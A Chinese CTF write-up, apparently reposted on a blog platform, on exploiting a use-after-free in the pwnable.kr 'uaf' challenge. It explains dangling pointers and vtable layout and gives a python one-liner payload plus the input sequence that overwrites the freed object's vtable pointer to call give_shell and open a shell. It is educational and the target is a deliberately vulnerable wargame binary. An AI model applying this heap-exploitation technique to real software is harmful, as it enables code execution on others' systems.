Use-After-Free

最新推荐文章于 2024-07-21 22:49:01 发布
最新推荐文章于 2024-07-21 22:49:01 发布
阅读量132 收藏 1
点赞数
文章标签: c/c++ python
原文链接:http://www.cnblogs.com/elvirangel/p/7206761.html
版权

0x00 UAF利用原理

uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(这个指针可以称为恶性迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。

0x01 UAF漏洞的利用步骤

(1)先精心构造一个迷途指针

(2)再精心构造数据填充被释放的内存区域

(3)再次使用该指针,改变程序流程

0x02 Pwnable.kr-uaf

源码如下;

 1 #include <fcntl.h>
 2 #include <iostream> 
 3 #include <cstring>
 4 #include <cstdlib>
 5 #include <unistd.h>
 6 using namespace std;
 7 
 8 class Human{
 9 private:
10     virtual void give_shell(){
11         system("/bin/sh");
12     }
13 protected:
14     int age;
15     string name;
16 public:
17     virtual void introduce(){
18         cout << "My name is " << name << endl;
19         cout << "I am " << age << " years old" << endl;
20     }
21 };
22 
23 class Man: public Human{
24 public:
25     Man(string name, int age){
26         this->name = name;
27         this->age = age;
28         }
29         virtual void introduce(){
30         Human::introduce();
31                 cout << "I am a nice guy!" << endl;
32         }
33 };
34 
35 class Woman: public Human{
36 public:
37         Woman(string name, int age){
38                 this->name = name;
39                 this->age = age;
40         }
41         virtual void introduce(){
42                 Human::introduce();
43                 cout << "I am a cute girl!" << endl;
44         }
45 };
46 
47 int main(int argc, char* argv[]){
48     Human* m = new Man("Jack", 25);
49     Human* w = new Woman("Jill", 21);
50 
51     size_t len;
52     char* data;
53     unsigned int op;
54     while(1){
55         cout << "1. use\n2. after\n3. free\n";
56         cin >> op;
57 
58         switch(op){
59             case 1:
60                 m->introduce();
61                 w->introduce();
62                 break;
63             case 2:
64                 len = atoi(argv[1]);
65                 data = new char[len];
66                 read(open(argv[2], O_RDONLY), data, len);
67                 cout << "your data is allocated" << endl;
68                 break;
69             case 3:
70                 delete m;
71                 delete w;
72                 break;
73             default:
74                 break;
75         }
76     }
77 
78     return 0;    
79 }
uaf

 根据分析源码,大致漏洞利用思路:

因为在main函数开始处已经申请了两块内存

    Human* m = new Man("Jack", 25);
    Human* w = new Woman("Jill", 21);

我们只要执行case 3就可以让这两个指针成为迷途指针,加以利用

case 3:
                delete m;
                delete w;
                break;

观察到case 2 申请了一块内存,并且对这块内存进行写操作

case 2:
                len = atoi(argv[1]);
                data = new char[len];
                read(open(argv[2], O_RDONLY), data, len);
                cout << "your data is allocated" << endl;
                break;

在具体利用之前我们先简单分析一下此时堆内存的分配情况,具体是c++类存在虚函数时的分配情况,我这里不细说,只给出结论,具体的可以参照

1.IDA pro第二版124面

2.c++类实例在内存中的分配 (转)

此时堆内存分配大致如下图所示:

加上case 1中执行introduce函数

case 1:
                m->introduce();
                w->introduce();
                break;

vtable指针指向类的虚函数表,introduce函数处于虚函数表第二项,即*(vtable+8)所指向的地址,又知道在虚表中give_shell函数的位置等于introduce函数位置 - 8.意思是假如我们先把vtable的值覆盖为vtable - 8,那么再执行introduce函数时就相当于执行give_shell函数。

通过IDA逆向分析,我们找到类Man的vtable的地址为0x401570.

利用脚本如下:

 

uaf@ubuntu:~$ python -c "print '\x68\x15\x40\x00\x00\x00\x00\x00'" > /tmp/poc
uaf@ubuntu:~$ ./uaf 24 /tmp/poc
1. use
2. after
3. free
3
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
1
$ cat flag

0x03 参考链接

pwnable.kr之uaf

逆向安全系列:Use After Free漏洞浅析

iOS冰与火之歌 – UAF and Kernel Pwn

转载于:https://www.cnblogs.com/elvirangel/p/7206761.html

weixin_30343157
关注
use after free 引起KE
兰宝的专栏
10-12 839
问题背景: 待机状态下,按Power键或者自动进入休眠,必现KE。 分析过程: 取出mtklog看到有db产生,确实发生了KE(kernel exception),取出db和vmlinux (必须是和当前软件是同一次编译的)后,使用GAT工具解开db,取出SYS_MINI_RDUMP,使用 gdb调试: $ arm-linux-androideabi-gdb v
ERROR: AddressSanitizer: heap-use-after-free on address
yah17763312367的博客
01-24 4605
力扣第二题 记录一下错误原因。虽然错误描述看不懂,但原因是自己的指针指向了自己。 heap堆 heap-use-after-free on address 释放地址后使用堆。 /** * Definition for singly-linked list. * struct ListNode { * int val; * ListNode *next; * ListNode() : val(0), next(nullptr) {} * ListNode(int x
Use After Free
钞sir的博客
01-11 8485
我恋你如烈酒般浓 我恨你如风如影朦 一清晨这一朦胧 粉身碎骨亦不逢 原理 use_after_free就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为NULL,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可...
pwn 之use_after_free
Maxmalloc的博客
12-08 557
题目链接 先贴出源代码 add_note notelist[i] = malloc(8u); ... *(_DWORD *)notelist[i] = print_note_content; printf(&amp;quot;Note size :&amp;quot;); read(0, &amp;amp;amp;buf, 8u); size = atoi(&amp;amp;am...
堆利用 - Use After Free
yms0211的博客
03-22 1130
堆利用 - Use After Free 概述: Use after free ,直译过来就是在释放后再利用,那么是怎么在释放后再利用的呢? 其实这个释放后再利用主要是因为在程序中原本指向某些函数或堆块的指针在堆块被free或函数结束后指针本身确没有被置空,那么这个没有被置空的指针所在的堆块虽然被释放了,但是我们却还可以通过程序内对堆块内部的操作来执行这个指针指向的函数。 #以下的内容截取自CTF-wiki# 堆块被释放后一般有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后
eu-16-Wen-Use-After-Use-After-Free-Exploit-UAF-By-Generating
08-29
【 eu-16-Wen-Use-After-Use-After-Free-Exploit-UAF-By-Generating 】这篇内容主要探讨了网络安全中的一个重要问题:Use-After-Free (UAF) 漏洞的利用和防御策略。作者Guanxing Wen是一名在Pangu LAB工作的安全研究...
做leetcode过程中遇到heap-use-after-free问题的解决方法
热门推荐
cncxycpp的博客
05-11 1万+
heap-use-after-free 背景:leetcode 25 K个一组翻转链表 用了很长时间解决这个问题,过程中心态甚至有一点小小波动。 问题截图: 问题解释:堆在释放后使用,意思是我使用了释放后的空间吗??(看了程序没有发现问题) 由于之前没有遇到过类似问题,所以选择了在网上寻找答案,看看有没有遇到相同问题的同学分享经验: 发现有位同学分享的是delete之后再次使用空间,就会报相同错,可是我并没有使用delete。 再找了一会发现没有能利用的,大多是对于这个错误的解释和工具使用方法,所以
LeetCode面试题 02.03. 删除中间节点——报错: AddressSanitizer: heap-use-after-free
qq_43531377的博客
01-20 2372
项目场景: 实现一种算法,删除单向链表中间的某个节点(即不是第一个或最后一个节点),假定你只能访问该节点。 示例: 输入:单向链表a->b->c->d->e->f中的节点c 结果:不返回任何数据,但该链表变为a->b->d->e->f 问题描述: free(node->next); 加这句将出现AddressSanitizer: heap-use-after-free报错,不加将存在一个无用节点node->next浪费内存(但好像无法解决)
力扣平台delete的问题:delete出现内存报错ERROR: AddressSanitizer: heap-use-after-free on address
CFY1226的博客
06-16 579
重新看了那个报错用例打了日志看也是也报错,应该判题程序会去调用原来的 root,但是程序把原来的 root 已经删了。一般不 delete 也是没问题的,但是就怕有些题数据量一大你不手动回收的话会内存泄露,毕竟我们用的是c++,不像 Java 那样可以自动 gc。关于delete的问题,我的建议如果确定删是没问题的,可以删一下,这也是良好的编码习惯,实际开发不可能一直不回收。但是,将报错用例在IDE里跑了一下,并没有内存问题。是力扣平台的问题,很坑,delete在IDE里面是正常的,并不会出现内存报错。
【C语言】解决C语言报错:Use-After-Free
Easonmax的博客
06-21 827
Use-After-Free(释放后使用)是C语言中常见且严重的内存管理错误之一。它通常在程序试图访问已经释放的内存时发生。这种错误会导致程序行为不可预测,可能引发段错误(Segmentation Fault)、数据损坏,甚至安全漏洞。本文将详细介绍Use-After-Free的产生原因,提供多种解决方案,并通过实例代码演示如何有效避免和解决此类错误。Use-After-Free,即释放后使用,是指程序在释放了某块动态分配的内存后,继续使用该内存。
Use After Free Tutorial
sdulibh的专栏
08-09 3206
Halvar Flake 在”Third Generation Exploitation”中,按照攻击的难度把漏洞利用技术分为了3个层次: (1) 第一类是基础的栈溢出利用。攻击者可以利用返回地址等轻松劫持进程,植入shellcode,例如,对strcpy,strcat等函数进行攻击。 (2) 第二类是高级的栈溢出漏洞。这时,栈中有许多限制因素。 (3) 第三类攻击则是堆溢出利用及格式化串漏
use after free 漏洞的利用方法(堆转堆栈然后rop)
thesum的专栏
12-20 1145
http://drops.wooyun.org/papers/4077
use-after-free漏洞发现之旅use-after-free漏洞发现之旅
weixin_33851177的博客
03-20 679
2019独角兽企业重金招聘Python工程师标准>>> ...
use-after-free漏洞-hacknote
qq_43390703的博客
10-17 1253
hacknote 经典的use-after-free漏洞。 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存
C++报错已解决】`Use-After-Free`
最新发布
鸽芷咕的博客
07-21 467
在软件开发中,`Use-After-Free` 是一个常见的问题,它发生在程序继续使用已经释放或不再有效的内存时。这种情况可能导致未定义的行为,包括程序崩溃。今天,我们将探讨如何解决 `Use-After-Free` 报错,确保你的程序更加健壮和稳定。🚀
heap-use-after-free
09-06
"heap-use-after-free" 是一种常见的内存错误,通常发生在程序试图在释放了一块内存后仍然引用该内存地址的情况下。 在使用堆分配的内存时,如果程序在释放内存后还引用该内存地址,就会导致 "heap-use-after-free...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值